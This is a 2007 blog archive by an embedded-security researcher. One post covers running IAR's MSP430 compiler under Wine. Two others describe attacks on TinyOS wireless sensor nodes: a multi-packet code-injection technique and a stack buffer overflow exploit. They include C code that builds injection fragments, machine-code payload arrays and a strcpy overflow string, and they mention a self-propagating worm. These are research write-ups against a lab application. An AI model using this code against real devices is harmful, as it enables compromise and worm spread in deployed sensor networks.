Friday, November 30, 2007

TI EZ430 in Linux with IAR Kickstart

by Travis Goodspeed [travis at utk.edu]
at the Extreme Measurement Communications Center
of the Oak Ridge National Laboratory


What follows are instructions for running the free version of IAR's C compiler for the MSP430 with Texas Instruments' EZ430 development tool in Linux under Wine. This will not work for Mac OS X until msp430-gdbproxy is made available for that platform. Also, this might not work with the full version of the compiler.

These instructions assume that you've installed wine, mspgcc, and msp430-gdbproxy. The assumption is also made that you've purchased the EZ430-F2013 development tool from Texas Instruments.

IAR Embedded Workbench



First, download slac050q.zip from the EZ430-F2013 page and unzip it to get FET_R510.exe. Running wine FET_R510.exe installs the compiler on Wine's virtual C: drive, ~/.wine/drive_c.



Next, you must find the executable and run it.

karen% find ~/.wine/drive_c -name icc\*.exe
/home/travis/.wine/drive_c/Program Files/IAR Systems/Embedded Workbench 4.0/430/bin/icc430.exe
karen% wine "C:\Program Files\IAR Systems\Embedded Workbench 4.0\430\bin\icc430.exe"
IAR MSP430 C/C++ Compiler V4.09A/W32 [Kickstart]
Copyright 1996-2007 IAR Systems. All rights reserved.

Available command line options:
--char_is_signed
'Plain' char is treated as signed char
--core {430|430X}
The processor core
430 (default)
430X
--data_model {small|medium|large}
Select data model (only for 430X core)
small Small model
16 bit registers. __data16 default. (default)
medium Medium model
20 bit registers. __data16 default. __data20 allowed.
large Large model
20 bit registers. __data20 default. __data16 allowed.
--debug
-r Insert debug info in object file
--dependencies=[i][m] file|directory
List file dependencies
i Include filename only (default)
m Makefile style
--diagnostics_tables file|directory
Dump diagnostic message tables to file
--diag_error tag,tag,...
Treat the list of tags as error diagnostics
--diag_remark tag,tag,...
Treat the list of tags as remark diagnostics
--diag_suppress tag,tag,...
Suppress the list of tags as diagnostics
--diag_warning tag,tag,...
Treat the list of tags as warning diagnostics
--discard_unused_publics
Discard unused public functions and variables (experimental)
--dlib_config pathname
Specify DLib library configuration file
--double {32|64}
The size of the double floating point type
32 32 bits (default)
64 64 bits
--ec++ Embedded C++
--eec++ Extended EC++ (EC++ with templates/namespaces/mutable/casts)
--enable_multibytes
Enable multibyte support
--error_limit limit
Stop after this many errors (0 = no limit)
--header_context
Adds include file context to diagnostics
--library_module
Make a library module
--lock_r4 Exclude register R4 from use by the compiler
--lock_r5 Exclude register R5 from use by the compiler
--mfc Enable multiple file compilation (experimental)
--migration_preprocessor_extensions
Enable IAR migration preprocessor extensions
--misrac Enable MISRA C diagnostics (not available)
--misrac_verbose
Enable verbose MISRA C messages (not available)
--module_name name
Set module name
--no_code_motion
Disable code motion
--no_cse Disable common sub-expression elimination
--no_fragments Do not generate section fragments
--no_inline Disable function inlining
--no_path_in_file_macros
Strip path from __FILE__ and __BASE_FILE__ macros
--no_tbaa Disable type based alias analysis
--no_typedefs_in_diagnostics
Don't use typedefs when printing types
--no_unroll Disable loop unrolling
--no_warnings Disable generation of warnings
--no_wrap_diagnostics
Don't wrap long lines in diagnostic messages
--omit_types Omit function/variable type info in object output
--only_stdout Use stdout only (no console output on stderr)
--output file|path
-o file|path Specify object file
--pic Generate position independent code
--preinclude filename
Include file before normal source
--preprocess=[c][n][l] file|directory
Preprocessor output
c Include comments
n Preprocess only
l Include #line directives
--public_equ symbol[=value]
Define public assembler symbol (EQU)
--reduce_stack_usage
Reduce usage of stack at the cost of larger and slower code
--regvar_r4 Allow register R4 to be used as a global register variable
--regvar_r5 Allow register R5 to be used as a global register variable
--remarks Enable generation of remarks
--require_prototypes
Require prototypes for all called or public functions
--save_reg20 Save 20-bit registers in interrupt functions
--silent Silent operation
--strict_ansi Strict ANSI rules
--warnings_affect_exit_code
Warnings affect exit code
--warnings_are_errors
All warnings are errors
-D symbol[=value]
Define macro (same as #define symbol [value])
-e Enable IAR C/C++ language extensions
-f file Read command line options from file
-I directory Add #include search directory
-l[c|C|D|E|a|A|b|B][N][H] file|directory
Output list file
c C source listing
C with assembly code
D with pure assembly code
E with non-sequential assembly code
a Assembler file
A with C source
b Basic assembler file
B with C source
N Don't include diagnostics
H Include header file source lines
-O[n|l|m|h|hs|hz]
Select level of optimization:
n No optimizations
l Low optimizations (default)
m Medium optimizations
h High optimizations
hz High optimizations, tuned for small code size
hs High optimizations, tuned for high speed
(-O without argument) The same setting as -Oh
-s{0-9} Optimize for speed:
0-2 Debug
3 Low
4-6 Medium
7-9 High
-z{0-9} Optimize for size:
0-2 Debug
3 Low (default)
4-6 Medium
7-9 High
karen%


The usage information is valuable but too long to scroll through, so pipe it to a text file for later reference. Also, make some symlinks to get at the include files and documentation more easily:

karen% sudo ln -s /home/travis/.wine/drive_c/Program\ Files/IAR\ Systems/Embedded\ Workbench\ 4.0 /opt/IAR
karen% ls /opt/IAR/430/doc/
EW430_AssemblerReference.pdf HelpMISRAC.chm embOS_IAR_plugin.pdf
EW430_CompilerReference.pdf IAR_Systems.jpg ew430.htm
EW430_MigrationGuide.pdf MSP-FET430 Users Guide.pdf htm.gif
EW430_UserGuide.pdf a430.htm icc430.htm
EW_MisraCReference.pdf a430_msg.htm icc430_msg.htm
Help430Compiler.chm appnotes migration.htm
Help430Contents.ENU.chm clib.pdf pdf.gif
Help430IDE1.chm cs430.htm readme.htm
Help430IDE2.chm embOSRelease.htm uC-OS-II-KA-CSPY-UserGuide.pdf
karen%


Make scripts for both the compiler and the assembler. I'm uninterested in the IDE.

#!/bin/sh
#/usr/local/bin/a430
#"$@" passes each argument through intact, even if it contains spaces.
wine "C:\Program Files\IAR Systems\Embedded Workbench 4.0\430\bin\a430.exe" "$@"

#!/bin/sh
#/usr/local/bin/icc430
wine "C:\Program Files\IAR Systems\Embedded Workbench 4.0\430\bin\icc430.exe" "$@"



The compiler's options are very different from those of GCC, and you must remember (or update your script) to include the IAR include directory if you intend to use its headers. A test compile of the LED blinker from slac080b.zip follows.

karen% icc430 -I "Z:\opt\IAR\430\inc" msp430x20x3_1.c --output blink.exe

IAR MSP430 C/C++ Compiler V4.09A/W32 [Kickstart]
Copyright 1996-2007 IAR Systems. All rights reserved.

34 bytes of CODE memory
0 bytes of DATA memory (+ 4 bytes shared)

Errors: none
Warnings: none
karen%


Now that the compiler is working, you'll need a linker. I use the following script:

#!/bin/sh
opts="-f Z:\opt\IAR\430\config\lnk430F2013.xcl -Fintel-standard Z:\opt\IAR\430\LIB\CLIB\cl430f.r43 -s __program_start "
xlink="C:\Program Files\IAR Systems\Embedded Workbench 4.0\common\bin\xlink.exe"
#$opts is left unquoted on purpose so that it splits into separate arguments.
wine "$xlink" "$@" $opts

msp430-objcopy aout.a43 aout.exe


The format switch, -Fintel-standard, makes xlink emit Intel hex (ihex), a format that msp430-objcopy can read. This lets the GNU tools, msp430-gdb in particular, load the executable onto the board. Also note that you'll need to uncomment lines 76 and 77 of /opt/IAR/430/config/lnk430F2013.xcl to define the stack and heap sizes. This script is called as xlink msp430x20x3_1.r43.

The following is a functional, if inelegant, Makefile:

ALL=msp430x20x3_1.exe

all: $(ALL)

msp430x20x3_1.r43: msp430x20x3_1.c
	icc430 -I "Z:\opt\IAR\430\inc" msp430x20x3_1.c
msp430x20x3_1.exe: msp430x20x3_1.r43
	xlink msp430x20x3_1.r43
	cp aout.exe msp430x20x3_1.exe



GDB



Assuming that msp430-gdb and the USB-FET drivers have been properly installed, the GDB server can be started with

karen% msp430-gdbproxy msp430 --spy-bi-wire /dev/ttyUSB0

Remote proxy for GDB, v0.7.1, Copyright (C) 1999 Quality Quorum Inc.
MSP430 adaption Copyright (C) 2002 Chris Liechti and Steve Underwood

GDBproxy comes with ABSOLUTELY NO WARRANTY; for details
use `--warranty' option. This is Open Source software. You are
welcome to redistribute it under certain conditions. Use the
'--copying' option for details.

debug: MSP430_Initialize()
debug: MSP430_Configure()
debug: MSP430_VCC(3000)
debug: MSP430_Identify()
info: msp430: Target device is a 'MSP430F20x3' (type 52)
debug: MSP430_Configure()
notice: msp430-gdbproxy: waiting on TCP port 2000


Your ~/.gdbinit file should be

set remoteaddresssize 16
set remotetimeout 999999
target remote localhost:2000
monitor interface spy-bi-wire


msp430-gdb runs with no options. Use load foo.exe to load an executable that has been made by msp430-objcopy.


karen% msp430-gdb
GNU gdb 6.0
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "--host=i686-pc-linux-gnu --target=msp430".notice: msp430-gdbproxy: connected
debug: MSP430_Registers(READ)
0x0000f800 in ?? ()

(gdb) load aout.exe
Loading section .sec1, size 0x38 lma 0xf800
debug: MSP430_Memory(WRITE)
Loading section .sec2, size 0x2 lma 0xfffe
debug: MSP430_Memory(WRITE)
Start address 0xf800, load size 58
Transfer rate: 464 bits in <1>


Note that without "monitor interface spy-bi-wire" in .gdbinit and "--spy-bi-wire" to msp430-gdbproxy, load will still work but many debugging functions will not. Also note that the run command seems to have issues with spy-bi-wire; use continue instead.

You should now be able to play around with the MSP430. Grab the MSP430F2013 datasheet and the MSP430x2xx Family User's Guide if you'll be doing anything fancy.

Monday, September 24, 2007

ToorCon 9 Presentation

I'll be presenting some of my wireless sensor network security research at ToorCon 9 in San Diego on Saturday, October the 20th at 17h00 Pacific time.

update:
I've posted the slides from the presentation at http://frob.us/~travis/2007oct_toorcon.pdf. A DVD is also available; contact the conference organizers for a copy.

Sunday, September 23, 2007

Memory-Constrained Code Injection

by Travis Goodspeed <travis at utk.edu>
at the Extreme Measurement Communications Center
of the Oak Ridge National Laboratory

Introduction


When injecting code into an embedded system, as was demonstrated in the prior article, entitled MSP430 Buffer Overflow Exploit for Wireless Sensor Nodes, the limited size of the injected code frequently becomes a problem. The following explains how a series of 128-byte packets can be used to inject an exploit much longer than any one of them. This method would also work in workstation and server attacks, but it is less valuable there because such platforms lack the severe memory constraints found in embedded systems.

It is assumed that the reader is familiar with the previously referenced article, and it is further assumed that a method for injecting short fragments of machine code exists. These examples are specific to TinyOS 2.x on the MSP430, but the principles in question should be of relevance for any resource-constrained target over a datagram channel of limited packet size.

General


The method presented here uses unallocated memory as a buffer. A large payload, one that is larger than any individual packet, is written into that buffer by a series of code injections, each of which stores a short piece of the larger payload before returning to normal execution.

Each packet sets a single word of memory to a word from its payload, so the attacker can copy as many words as are required to the victim, loading them at whatever address is specified. So long as the target region lies beneath the stack and above the heap, the payload will not interfere with the operation of the victim's firmware and will not be damaged or overwritten by another subroutine.

The memory layout looks something like this:

(Top of Memory, 0xFFFF)
Internal Flash{
Interrupt Vector Table
Data/Code
}
Internal Ram{
Stack (grows down)
Unused (between heap and stack)
Heap (grows up, often empty)
Globals
Memory-mapped I/O
}
(Bottom of Memory, 0x0000)


The payload will be housed in the unused region between the stack, which grows downward from the top of RAM, and the heap, which grows upward from just above the globals.
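The placement rule amounts to a bounds check. As a sketch: payload_fits_gap() is a hypothetical helper, and heap_end and stack_low are estimates the attacker would have to make for a particular firmware image, for instance from the end of its globals and from the deepest stack observed under a debugger. The numbers in the usage note are made up for illustration.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Returns true if the len bytes starting at target fall entirely inside
 * the unused gap between heap_end (first address above the globals and
 * heap) and stack_low (lowest address the stack is expected to reach).
 * Both bounds are estimates supplied by the caller. */
bool payload_fits_gap(uint16_t target, uint16_t len,
                      uint16_t heap_end, uint16_t stack_low)
{
    uint32_t end = (uint32_t)target + len;  /* one past the last byte */

    assert(heap_end <= stack_low);
    if (target & 1)
        return false;  /* word writes and code need an even address */
    if (target < heap_end)
        return false;  /* would overwrite globals or heap */
    if (end > stack_low)
        return false;  /* would collide with the stack */
    return true;
}
```

For example, with heap_end = 0x0300 and stack_low = 0x0800, a 256-byte payload at 0x0400 fits, while the same payload at the odd address 0x0401 does not.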

Specific


Suppose that an attacker is capable of broadcasting packets which allow a six-byte payload to be executed on a victim. Further, suppose that the attacker wishes to execute a single block PB of 256 bytes of machine code at address TA, within a contiguous region and without interruption.

The attacker can craft a memory-injection (MI) packet which sets an address to a value. In MSP430 assembly, this is expressed as
MOV.W #val, &addr
which sets the word at memory location addr to val. To place the value DEAD at the memory location BEEF, one would use
MOV.W #0xdead, &0xbeef
As machine language using absolute addressing, this would be
{0x40b2, 0xdead, 0xbeef}
The latter two words may be substituted as required, making it trivial to have a function write injection code on the fly, such as


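#include <stdint.h>

/*! Takes a pointer to a six-byte (three-word) region which is populated
 * with machine code for MOV.W #value, &address.
 */
void attackcode_set(uint16_t *code,
                    uint16_t address,
                    uint16_t value){
  code[0]=0x40b2;  //MOV.W #imm, &abs
  code[1]=value;   //source extension word: the immediate
  code[2]=address; //destination extension word: the absolute address
}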
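The constant 0x40b2 follows from the MSP430's double-operand (Format I) instruction layout: a 4-bit opcode, the source register, the destination addressing bit Ad, the byte/word bit, the 2-bit source addressing mode As, and the destination register. The sketch below, using hypothetical helper names, assembles that word from its fields. An immediate source is encoded as @PC+ (register 0, As=3) and an absolute destination as indexed mode on the status register (register 2, Ad=1), which is why the immediate and then the address follow the opcode as two extension words.

```c
#include <assert.h>
#include <stdint.h>

/* Assemble the first word of an MSP430 double-operand (Format I)
 * instruction. Field layout, most significant bit first:
 * opcode[15:12] sreg[11:8] Ad[7] B/W[6] As[5:4] dreg[3:0] */
static uint16_t fmt1_word(unsigned opcode, unsigned sreg, unsigned ad,
                          unsigned bw, unsigned as, unsigned dreg)
{
    assert(opcode <= 0xf && sreg <= 0xf && ad <= 1 &&
           bw <= 1 && as <= 3 && dreg <= 0xf);
    return (uint16_t)((opcode << 12) | (sreg << 8) | (ad << 7) |
                      (bw << 6) | (as << 4) | dreg);
}

enum { OP_MOV = 0x4, REG_PC = 0, REG_SR = 2 };

/* MOV.W #value, &address:
 *   source #value   = @PC+ : sreg = PC (0), As = 3
 *   dest   &address = absolute mode, indexed on SR (which reads as 0
 *                     here): dreg = SR (2), Ad = 1
 * The immediate and the address follow as extension words, in that
 * order. */
void encode_mov_imm_abs(uint16_t code[3], uint16_t address, uint16_t value)
{
    code[0] = fmt1_word(OP_MOV, REG_PC, 1, 0, 3, REG_SR);
    code[1] = value;
    code[2] = address;
}
```

Calling encode_mov_imm_abs(code, 0xbeef, 0xdead) yields the same {0x40b2, 0xdead, 0xbeef} shown above.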


Thus, to copy a block of code to the victim, the attacker would build 128 injection payloads, one per word of PB, with the following loop:

//Populate the buffer MI with memory injections to place all of PB at TA.
//PB holds 256 bytes, i.e. 128 (0x80) words, so MI needs 128 entries.
for(int i=0;i<0x80;i++)
  attackcode_set(MI[i], TA+2*i, PB[i]);


Each packet of MI[] is then broadcast, in any order whatsoever. As each packet is received, another two bytes at or above TA, the target address, are set. Thus, two bytes at a time, the whole payload is transferred to the victim. Once every word has been delivered, one final injection is sent, one that writes nothing to memory. Rather, it jumps to TA to begin the previously loaded code, all 256 bytes of it.
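The whole delivery can be staged ahead of time as an array of fragments. This sketch assumes, as the text does, that PB is 128 words and that each injected fragment may be up to six bytes. The helper names build_injections() and attackcode_branch() are hypothetical, and the final fragment uses BR #TA (the assembler's emulated form of MOV #TA, PC, encoded as 0x4030 followed by the target) to transfer control; how the loaded code should eventually exit depends on the victim and is not addressed here.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PB_WORDS 128  /* a 256-byte payload is 128 16-bit words */

/* MOV.W #value, &address, exactly as attackcode_set() above. */
static void attackcode_set(uint16_t *code, uint16_t address, uint16_t value)
{
    code[0] = 0x40b2;
    code[1] = value;
    code[2] = address;
}

/* BR #target, which assemblers emulate as MOV #target, PC (0x4030).
 * It needs only two words; the third slot is left as zero. */
static void attackcode_branch(uint16_t *code, uint16_t target)
{
    code[0] = 0x4030;
    code[1] = target;
    code[2] = 0;
}

/* Fill mi[0..PB_WORDS-1] with one memory-injection fragment per payload
 * word, and mi[PB_WORDS] with the final branch to ta. mi must have room
 * for PB_WORDS + 1 fragments. Returns the number of fragments written. */
size_t build_injections(uint16_t mi[][3], const uint16_t *pb, uint16_t ta)
{
    assert((ta & 1) == 0);  /* word writes need an even target address */
    for (size_t i = 0; i < PB_WORDS; i++)
        attackcode_set(mi[i], (uint16_t)(ta + 2 * i), pb[i]);
    attackcode_branch(mi[PB_WORDS], ta);
    return PB_WORDS + 1;
}
```

Because each fragment names its own destination address, the first 128 fragments can arrive in any order; only the branch must come last.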

Injection of Complete Firmware


Once this longer payload has been installed, it can be used to copy a portion of itself to external flash. This can be repeated until a complete firmware--that is to say software which resides in internal flash--exists on external flash. Then a short loader routine could copy it from external to internal flash, thereby replacing the victim's firmware with the attacker's. If this new firmware were to begin broadcasting its own installation routine, the result would be a self-propagating worm.

Conclusion


One should never assume that an embedded platform is safe from sophisticated injection attacks because of the limitations imposed by a datagram networking framework, such as 802.15.4. Even without streaming or the buffering of prior packets, it's possible, in fact rather trivial, to inject a payload significantly larger than the packet size.

Please contact me if you know of any prior implementation or discussion of this technique. I would be much obliged.

Friday, August 3, 2007

MSP430 Buffer Overflow Exploit for Wireless Sensor Nodes

by Travis Goodspeed <travis at radiantmachines.com>


Abstract



What follows is a detailed account of the creation of a stack-overflow exploit targeting TinyOS 2.x on a Tmote Sky wireless sensor node, which uses the Texas Instruments MSP430 microcontroller. An example application is used as a target, rather than one which might be found in the wild. A firm knowledge of C, assembly language, and embedded systems architectures is assumed, but the details of NesC, the MSP430, and TinyOS are reviewed for those new to this platform. Finally, preventative measures are discussed.

Before We Begin


By default, the NesC compiler attaches the inline keyword to every function that it generates, even if that function began as a C function. To prevent this, use __attribute__ ((noinline)). Without this attribute, you'll go through hell trying to understand a function with twenty others embedded within it. Note that inlining isn't what makes these attacks possible or impossible; disabling it just makes them easier to understand.

Disassembly


I'll begin with a short example which uses gdb on a local image of a simple TinyOS application. This requires msp430-gdb, but does not require a JTAG debugger or any physical hardware.

Use the "disassemble" command to view an individual function.

(gdb) disassemble RadioCountToLedsC$red
Dump of assembler code for function RadioCountToLedsC$red:
0x000053f4 <radiocounttoledsc$red+0>: mov.b #1, r15 ;r3 As==01
0x000053f6 <radiocounttoledsc$red+2>: call #21500 ;#0x53fc
0x000053fa <radiocounttoledsc$red+6>: ret
End of assembler dump.
(gdb)
The original source for this was
//within RadioCountToLedsC implementation
void __attribute__ ((noinline)) red(){
call Leds.set(1);
}


Note that the function acts just as its C equivalent would. red+0 loads the constant #1 from the constant generator r3 into r15, the register which contains the first parameter to a C function in the MSP430 version of GCC. A call is then made to 0x53fc, which we know as Leds.set().


Disassemble also accepts an address as its argument, so let's take a peek under the hood and see what Leds.set() does.

(gdb) disassemble 0x53fc
Dump of assembler code for function LedsP$Leds$set:
0x000053fc <ledsp$leds$set+0>: push r11 ;
0x000053fe <ledsp$leds$set+2>: mov.b r15, r11 ;
0x00005400 <ledsp$leds$set+4>: call #16460 ;#0x404c
0x00005404 <ledsp$leds$set+8>: mov.b r15, r14 ;
0x00005406 <ledsp$leds$set+10>: mov.b r11, r15 ;
0x00005408 <ledsp$leds$set+12>: and.b #1, r15 ;r3 As==01
0x0000540a <ledsp$leds$set+14>: jz $+10 ;abs 0x5414
0x0000540c <ledsp$leds$set+16>: and.b #-17, &0x0031 ;#0xffef
0x00005412 <ledsp$leds$set+22>: jmp $+8 ;abs 0x541a
0x00005414 <ledsp$leds$set+24>: bis.b #16, &0x0031 ;#0x0010
0x0000541a <ledsp$leds$set+30>: mov.b r11, r15 ;
0x0000541c <ledsp$leds$set+32>: and.b #2, r15 ;r3 As==10
0x0000541e <ledsp$leds$set+34>: jz $+10 ;abs 0x5428
0x00005420 <ledsp$leds$set+36>: and.b #-33, &0x0031 ;#0xffdf
0x00005426 <ledsp$leds$set+42>: jmp $+8 ;abs 0x542e
0x00005428 <ledsp$leds$set+44>: bis.b #32, &0x0031 ;#0x0020
0x0000542e <ledsp$leds$set+50>: mov.b r11, r15 ;
0x00005430 <ledsp$leds$set+52>: and.b #4, r15 ;r2 As==10
0x00005432 <ledsp$leds$set+54>: jz $+10 ;abs 0x543c
0x00005434 <ledsp$leds$set+56>: and.b #-65, &0x0031 ;#0xffbf
0x0000543a <ledsp$leds$set+62>: jmp $+8 ;abs 0x5442
0x0000543c <ledsp$leds$set+64>: bis.b #64, &0x0031 ;#0x0040
0x00005442 <ledsp$leds$set+70>: mov.b r14, r15 ;
0x00005444 <ledsp$leds$set+72>: call #16480 ;#0x4060
0x00005448 <ledsp$leds$set+76>: pop r11 ;
0x0000544a <ledsp$leds$set+78>: ret
End of assembler dump.
(gdb)


Note that this comes from the NesC declaration of
async command void set(uint8_t val);

which suggests that commands are rendered straight to C functions, with the call keyword merely calling the function. In actual usage, call doesn't determine how the function is invoked, only whether the invocation is allowed: a command may not be called from an interrupt handler unless it also possesses the async keyword. Note that set() would have been automatically inlined if it had not been called from multiple source functions.

Inline Assembly



Inline assembly language is quite easy as well. Suppose that we would like to find the value of the stack pointer:
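int __attribute__ ((noinline))
getsp(){
  //No return statement: mspgcc returns ints in r15,
  //so the value the asm leaves there is the result.
  __asm__("mov r1, r15");
}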

The preceding code simply copies r1, the Stack Pointer, into r15, which mspgcc's ABI uses as the return register. Testing the disassembled code gives us:
(gdb) disassemble RadioCountToLedsC$getsp
Dump of assembler code for function RadioCountToLedsC$getsp:
0x000053f4 <RadioCountToLedsC$getsp+0>: mov r1, r15 ;
0x000053f6 <RadioCountToLedsC$getsp+2>: ret
End of assembler dump.
(gdb)


Note that the use of r15 is a compiler convention, not a property of the hardware; different compilers use the registers for different things. I've written an article comparing IAR's ABI to that of GCC which explains the issue in detail.

Machine Language



The following msp430-gdb session shows how to get the getsp() function as its machine-language bytes rather than as disassembled code:
(gdb) x/bx RadioCountToLedsC$getsp
0x53f4 <RadioCountToLedsC$getsp>: 0x0f
(gdb)
0x53f5 <RadioCountToLedsC$getsp+1>: 0x41
(gdb)
0x53f6 <RadioCountToLedsC$getsp+2>: 0x30
(gdb)
0x53f7 <RadioCountToLedsC$getsp+3>: 0x41
(gdb)

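In the above example, x/bx means "examine as hexadecimal bytes," and each empty line repeats the command for the next byte. I could also have used x/hx to examine half-words (gdb calls a 32-bit value a word, so a 16-bit MSP430 word is a half-word here), but the little-endian nature of the target platform makes that a little confusing, as each half-word is printed with its two bytes in the reverse of their order in memory.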

What this means is that we can declare a C byte array of {0x0f,0x41,0x30,0x41} or a string of "\x0f\x41\x30\x41" at any even address and execute a call to its address in order to execute it. The even addressing is essential, as r0--the PC--cannot hold an unaligned address and unaligned word accesses are not supported by the MSP430. Because this architecture is little endian, the code as a 16-bit integer array is not {0x0f41, 0x3041} but rather {0x410f,0x4130}.
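Converting gdb's byte dump into the word array is mechanical. This host-portable sketch (the function name is hypothetical) pairs up bytes in little-endian order, low byte first, and reproduces the {0x410f, 0x4130} array for getsp().

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Pack a little-endian byte sequence, as shown by gdb's x/bx, into
 * 16-bit words: the first byte of each pair is the low half. */
void bytes_to_le_words(const uint8_t *bytes, size_t nbytes, uint16_t *words)
{
    assert(nbytes % 2 == 0);  /* MSP430 instructions are whole words */
    for (size_t i = 0; i < nbytes / 2; i++)
        words[i] = (uint16_t)(bytes[2 * i] | (bytes[2 * i + 1] << 8));
}
```

Doing the conversion on the host keeps it independent of the build machine's own byte order, since the shifts describe the target's layout explicitly.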

I've been using gcc and gdb to generate machine code, but the mspgcc project has made a single-instruction assembler available through the web. Remember that it gives results as little-endian words.

Instruction Emulation



It's important to realize that MSP430 assembly language contains many instructions which don't exist on the physical chip. Instead, the assembler emulates them by translating each into an equivalent core instruction.

For example, suppose we have the following function using inline assembly:
void __attribute__ ((noinline))
setled(){
  asm("inv &0x0031");
}


INV is an emulated instruction which flips the bits of its destination by XORing them with 0xFFFF. Why should the chip have a separate instruction when the programmer could simply write XOR #-1,&0x0031? In practice, that is what happens, as our disassembly shows:
(gdb) disassemble BlinkC$setled
Dump of assembler code for function BlinkC$setled:
0x00004712 <BlinkC$setled+0>: xor #-1, &0x0031 ;r3 As==11
0x00004716 <BlinkC$setled+4>: ret
End of assembler dump.
(gdb)
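The same Format I field layout explains the other emulated instructions used in this article. The sketch below (helper names hypothetical) derives INV &addr, NOP, and RET from the core MOV and XOR opcodes. It relies on the constant generator R3, which supplies -1 in mode As=3 and 0 in mode As=0 without needing an extension word.

```c
#include <assert.h>
#include <stdint.h>

enum { OP_MOV = 0x4, OP_XOR = 0xe };             /* Format I opcodes */
enum { R_PC = 0, R_SP = 1, R_SR = 2, R_CG = 3 }; /* special registers */

/* First word of a Format I (double-operand) word instruction:
 * opcode[15:12] sreg[11:8] Ad[7] B/W[6]=0 As[5:4] dreg[3:0] */
static uint16_t fmt1(unsigned op, unsigned sreg, unsigned ad,
                     unsigned as, unsigned dreg)
{
    assert(op <= 0xf && sreg <= 0xf && ad <= 1 && as <= 3 && dreg <= 0xf);
    return (uint16_t)((op << 12) | (sreg << 8) | (ad << 7) | (as << 4) | dreg);
}

/* INV &addr == XOR #-1, &addr. R3 in mode As=3 is the constant
 * generator's -1, so only the absolute address follows as an
 * extension word (0x0031 in setled()). */
uint16_t inv_abs_opcode(void) { return fmt1(OP_XOR, R_CG, 1, 3, R_SR); }

/* NOP == MOV #0, R3: R3 in mode As=0 generates the constant 0. */
uint16_t nop_opcode(void) { return fmt1(OP_MOV, R_CG, 0, 0, R_CG); }

/* RET == MOV @SP+, PC: mode As=3 on SP pops a word into PC. */
uint16_t ret_opcode(void) { return fmt1(OP_MOV, R_SP, 0, 3, R_PC); }
```

These produce 0xe3b2, 0x4303, and 0x4130, the words that appear in the machlang arrays throughout this article.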


Machine Language Execution Example


After a bit of effort, which would've been greatly reduced if my Flash Emulation Tool had arrived, I came up with the following piece of code:
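//machine code, as little-endian words, to toggle the LED
int machlang[15]={
  0xe3b2, 0x0031, //xor #-1,&0x31 (emulating INV)
  0x4130          //ret
};
int (*machfn)() = NULL;
machfn= (int (*)()) machlang; //treat the array's address as a function
machfn();                     //call it; its ret returns here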


The above code executes the machine language code to toggle the LED by inverting the memory-mapped port at 0x31. The words of machlang[] may reside anywhere in the memory space, which is to say anywhere in RAM or ROM, so long as they start at an even address.

Buffer Overflow Stack Injection



Machine language injection works by virtue of the call stack, which in TinyOS grows downward from near the top of RAM (high addresses) toward the bottom of RAM (low address, 0x200). When a function begins, the word at the top of the stack (its lowest address) holds the return address, which points into the calling function just past the CALL instruction. When the function executes the RET instruction, the processor copies the word at the address held in R1 (SP) into R0 (PC) and increments R1 by two, shrinking the stack by one word.
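To make these mechanics concrete, here is a toy host-side model of CALL and RET. The struct and function names are hypothetical, the RAM size is arbitrary, and only word-aligned accesses are modelled. The usage replays the call from red() to Leds.set() seen earlier, then shows that whatever word sits at SP when RET executes becomes the new PC.

```c
#include <assert.h>
#include <stdint.h>

/* Toy model of the MSP430's CALL and RET. Memory is byte-addressed but
 * only even word accesses are modelled; the stack grows downward. */
struct cpu {
    uint16_t pc, sp;
    uint16_t ram[0x400 / 2];  /* words at 0x0000..0x03fe, illustrative */
};

static uint16_t *word_at(struct cpu *c, uint16_t addr)
{
    assert((addr & 1) == 0 && addr < 0x400);
    return &c->ram[addr / 2];
}

/* CALL #target: SP -= 2, store the return address, PC = target.
 * insn_len is the length of the CALL instruction (4 bytes for #imm). */
void cpu_call(struct cpu *c, uint16_t target, uint16_t insn_len)
{
    c->sp -= 2;
    *word_at(c, c->sp) = (uint16_t)(c->pc + insn_len);
    c->pc = target;
}

/* RET (MOV @SP+, PC): PC = word at SP, then SP += 2. */
void cpu_ret(struct cpu *c)
{
    c->pc = *word_at(c, c->sp);
    c->sp += 2;
}
```

With pc = 0x53f6 and sp = 0x0300, cpu_call(&c, 0x53fc, 4) stores 0x53fa, the address of red()'s ret, at 0x02fe. If that stored word is overwritten before cpu_ret() runs, execution continues at the overwritten value instead.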

The following code overwrites the stack's stored copy of the calling PC such that when it returns, control jumps to machlang instead of the calling function:
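void __attribute__ ((noinline))
setled(){
  //call it the rude way by overwriting the return address.
  //This assumes oldpc is the only thing in the frame, stored
  //directly below the saved PC; check the disassembly.
  int *oldpc=(int*)&oldpc; //point to the top of the frame (lowest address)
  oldpc++;                 //advance by one int, i.e. 2 bytes, not 1
  *oldpc=(int)machlang;    //overwrite the saved PC
  return;                  //return to machlang, not the calling function
}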


In the above code, the pointer oldpc is declared and incremented such that it points at the stack value pushed before itself, which is of course the stored PC value that the function will jump to when it returns. When return; executes, the processor jumps not to the calling function but rather to the machine code, causing it to be executed.

Buffer overflow injections work in a similar way, but rather than setting the pointer explicitly in C code, they use a string that, when copied into a buffer, runs past the end of the buffer and overwrites whatever follows it. The following code does just that, by calling strcpy() on a string composed of the machine language entry address repeated many times.
//code fragment: composition function
//compose a null-terminated string
//of repeating machlang addresses.
//None of the address's bytes may be zero, or strcpy() stops early.
//assumed declarations, not shown in the original:
int evilcmd[11];
int *payload;
for(payload=evilcmd;
    payload<evilcmd+10;
    payload++){
  *payload=(int)machlang;
}
*payload=0;//null-terminator

//code fragment, copying function
char cmd[6]="Hello";
strcpy(cmd,(char*)evilcmd); //overflows cmd, overwriting the saved PC
return;//to machlang

//new machlang to enter an infinite loop.
int machlang[30]={
  0xe3b2, 0x0031, //xor #-1,&0x31 (emulating INV)

  //while(1);
  0x4303, //mov r3,r3 (emulating NOP)
  0x3fff, //jmp $ (jump to itself)
};


This is a bit crude, in that it overwrites more than just the stored PC. Note, however, that the string can be dropped in with no specialized code in the copying function. In order to see that this worked, the machlang array must be changed to enter an infinite loop when complete. It cannot successfully return, because it overwrote more than just the stored return address it was aiming for. This side effect is unavoidable when the stack is as dense as it is on the MSP430, as the null terminator must also be copied. Thus, unless the high byte of the target address (the latter byte, in little-endian order) happens to be 0x00, the byte immediately above the stored return address must necessarily be clobbered.
